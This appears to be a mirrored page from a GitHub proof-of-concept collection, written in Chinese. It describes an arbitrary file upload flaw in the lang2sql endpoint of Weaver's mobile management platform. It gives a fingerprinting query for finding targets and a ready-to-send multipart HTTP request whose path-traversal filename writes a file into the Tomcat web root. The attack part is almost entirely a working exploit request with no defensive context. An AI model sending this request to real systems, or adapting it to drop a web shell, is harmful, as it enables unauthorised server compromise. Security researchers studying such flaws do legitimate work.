mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-07-29 05:54:14 +00:00
29 lines
937 B
Markdown
29 lines
937 B
Markdown
## 泛微移动管理平台lang2sql接口任意文件上传
|
|
|
|
##
|
|
```
|
|
web.title="移动管理平台"
|
|
```
|
|
|
|
|
|
## poc
|
|
```
|
|
POST /emp/lang2sql?client_type=1&lang_tag=1 HTTP/1.1
|
|
Content-Type: multipart/form-data;boundary=----WebKitFormBoundarymVk33liI64J7GQaK
|
|
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
|
|
Accept-Language: zh-CN,zh;q=0.9
|
|
Host: 目标地址
|
|
Content-Length: 202
|
|
Expect: 100-continue
|
|
Connection: close
|
|
|
|
------WebKitFormBoundarymVk33liI64J7GQaK
|
|
Content-Disposition: form-data; name="file";filename="../../../../appsvr/tomcat/webapps/ROOT/9SIpL.txt"
|
|
|
|
b9Q2Itmn1
|
|
------WebKitFormBoundarymVk33liI64J7GQaK--
|
|
```
|
|

|
|
|
|

|